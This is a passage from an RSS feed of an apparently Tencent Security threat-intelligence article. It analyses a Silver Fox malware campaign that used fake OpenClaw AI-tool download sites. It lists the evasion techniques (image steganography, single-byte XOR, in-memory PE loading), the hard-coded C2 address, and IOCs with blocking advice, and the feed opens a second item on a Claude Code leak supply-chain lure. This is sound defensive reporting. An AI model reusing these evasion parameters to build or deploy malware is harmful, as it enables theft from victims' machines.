255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 或者全部失败静默退出。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="165" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">第四阶段：建立远控通道</span></h2><p data-line="167" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">内存中的 PE 后门执行后，会立即与攻击者预设的 C2 服务器建立通信连接。一旦连接成功，攻击者即可远程下发任意指令，包括但不限于：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">窃取浏览器保存的账号密码与 Cookie、键盘记录、屏幕截图、文件窃取与上传、横向渗透内网其他主机</span></strong><span leaf="">——受害者的整台设备将完全处于攻击者的控制之下。</span></p><p data-line="169" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">C2 地址和端口均以明文硬编码在样本的数据段中：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">C2 地址: 27.124.44.134</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">通信端口: 25449 (0x6369)</span></p></code></pre></p><p data-line="177" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">至此，攻击者完成了从钓鱼引流到远程控制的完整闭环。受害者的机器已经沦为一台安静的傀儡，等待来自 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">27.124.44.134:25449</span></code><span leaf=""> 的下一步指令。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="181" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">完整攻击链</span></h2><p data-line="183" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">回顾整个攻击流程，从初始接触到最终控制，每一步都经过精心设计：<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-type="png" data-w="1024" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027966" src="https://wechat2rss.xlab.app/img-proxy/?k=731022c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwW6oW1e26IDohl3FMSGTicxOqjb0JaB4qhwQRiamc3lLuQhccavXMo3wc8bklYpqMufDhEluQo3oT3lINZsxSQ4TrzRkBZxO0Un0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="189" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">技术手法小结</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2528px;"><thead><tr><th align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">攻击阶段</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">技术手段</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">意图</span></p></th></tr></thead><tbody><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">引流</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">多域名钓鱼站群 + 多风格 UI</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">扩大覆盖面，提升可信度</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">投递</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">海外节点托管</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">利用合法云存储规避域名封堵</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">伪装</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">仿冒&#34;一键部署&#34;工具界面</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">降低用户戒心，诱导执行</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">隐藏</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">图片隐写（ziliao.jpg）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">将恶意载荷伪装为无害图片文件</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">校验</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">自定义魔数 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x7B7FE992</span></code></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">防止误触发，对抗沙箱随机文件分析</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">加密</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">单字节 XOR </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x7B</span></code></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">绕过静态文件签名检测</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">执行</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">VirtualAlloc 内存加载</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Fileless 执行，规避杀软文件扫描</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">控制</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">硬编码 C2 通信</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">建立远程控制通道</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="204" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">IOCs（威胁指标）</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2528px;"><thead><tr><th align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">指标</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">备注</span></p></th></tr></thead><tbody><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">钓鱼域名</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">zh-openclaw[.]com[.]cn</span></code><p><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">openclaw-cc[.]com[.]cn</span></code><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wap-openclaw[.]com[.]cn</span></code><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cc-openclaw[.]com[.]cn</span></code></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">4 个仿冒 OpenClaw 官网，均为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.com[.]cn</span></code><span leaf=""> 后缀</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">下载地址</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hxxps://wjrdq5o[.]oss-ap-southeast-1[.]aliyuncs[.]com/openclaw1.1.zip</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">新加坡节点托管</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">C2</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">27.124.44[.]134:25449</span></code><p><span leaf="">（端口 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x6369</span></code><span leaf="">）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">硬编码于数据段</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ea6686bc1cb192007e4b43f51d4c0f74</span></code><p><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">829f2888dac28affe0515f3f5c171bf9</span></code></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">恶意样本哈希</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">关键文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">openclaw1.1.zip</span></code><p><span leaf="">（投递包）</span><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">iusb3mon.exe</span></code><span leaf="">（恶意主体）</span><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf="">（图片隐写载荷）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">攻击链涉及文件</span></p></td></tr><tr><td align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">载荷特征</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">魔数 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x7B7FE992</span></code><span leaf="">（小端 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">92 E9 7F 7B</span></code><span leaf="">）</span><span leaf=""><br/></span><span leaf="">解密密钥 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x7B</span></code><span leaf="">（XOR 单字节异或）</span><span leaf=""><br/></span><span leaf="">PE 偏移 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x5BF</span></code></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">ziliao.jpg 隐写载荷校验与解密参数</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="217" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">总结与建议</span></h2><p data-line="219" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这不是一次粗糙的钓鱼攻击。从多站点多风格的仿冒矩阵，到图片隐写 + XOR 加密 + 内存加载的组合拳，攻击者在每个环节都展现了不俗的工程化能力。他们瞄准的是当下最炙手可热的赛道——</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AI 智能体工具</span></strong><span leaf="">，利用开发者对开源社区的天然信任，将恶意软件包装成&#34;一键部署&#34;的便捷工具。</span></p><p data-line="221" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">银狐家族的这个变种告诉我们一个朴素的道理：越是热门的工具，越可能成为攻击者的伪装外衣。</span></strong></p><h3 data-line="223" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">防护建议</span></h3><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="225" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">验证下载源</span></strong><span leaf="">：始终从 OpenClaw 官方 GitHub 仓库下载安装包，不要轻信搜索引擎中排名靠前的&#34;官网&#34;链接。核对域名中是否包含多余的前后缀（如 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">zh-</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">-cc</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wap-</span></code><span leaf="">）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="227" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">警惕 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.com.cn</span></code><span leaf=""> 仿冒域名</span></strong><span leaf="">：本次攻击的 4 个钓鱼域名均使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.com.cn</span></code><span leaf=""> 后缀，而 OpenClaw 官方并不使用该域名后缀</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="229" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">网络层封堵</span></strong><span leaf="">：在防火墙 / IDS 中封禁 C2 地址 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">27.124.44.134</span></code><span leaf=""> 及端口 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">25449</span></code><span leaf="">，同时将恶意 OSS 地址 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wjrdq5o.oss-ap-southeast-1.aliyuncs.com</span></code><span leaf=""> 加入黑名单</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="231" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">域名黑名单</span></strong><span leaf="">：将上述 4 个钓鱼域名加入 DNS 黑名单 / 安全网关拦截策略</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="233" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">终端行为检测</span></strong><span leaf="">：重点关注以下行为组合——进程搜索并读取 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 文件、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">VirtualAlloc</span></code><span leaf=""> 分配可执行内存后立即跳转执行、向 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">27.124.44.134:25449</span></code><span leaf=""> 发起外联连接</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="235" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">文件排查</span></strong><span leaf="">：检查系统中是否存在 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 文件（桌面、AppData\Local 等路径），如有发现应立即隔离并提交样本分析</span></p></li></ol><p data-line="238" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对OpenClaw安全风险，腾讯推出多场景安全防护矩阵：</span></strong><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.9694444444444446" data-type="jpeg" data-w="1080" style=";" data-imgfileid="100027969" src="https://wechat2rss.xlab.app/img-proxy/?k=dfbd43c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwUDMOWZN4XsMpr33d5XduRryicZsneAwU5mMOo4mB2qJAFlnlkA0EoZDJibW4uicYu9WiasLBAoO3Iqcv9aqj6s0Cbmibq4QauFKvD0%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p data-line="241" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=50db008e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511618%26idx%3D1%26sn%3D4ec6bbad9b2ae648bc29ebc53d0cb2ed">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 07 Apr 2026 14:53:00 +0800</pubDate>
    </item>
    <item>
      <title>借&#34;码&#34;行凶 | Claude Code 源码泄露引爆供应链投毒，窃密木马暗度陈仓</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511607&amp;idx=1&amp;sn=67a18e00bf624c50e18463ca7ca4f5b5</link>
      <description>源码泄露的黄金48小时，攻击者用“官方泄露版”在GitHub埋下伏笔。开发者好奇搜索，便落入商业窃密木马的陷阱，浏览器密码、加密货币钱包瞬间沦陷。</description>
      <content:encoded><![CDATA[<p><span>腾讯安全威胁情报</span> <span>2026-04-03 14:30</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=3d7091cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwX3cshyG0Tphvd4Xl1DqyyBc66kKdyokEXRN3OWIibI9IXqjy7565ygCNvN1nF9PcvOGoia0tOXWafbkjib7kyNevK4OtmmIkTH1s%2F0%3Fwx_fmt%3Djpeg"/></p>
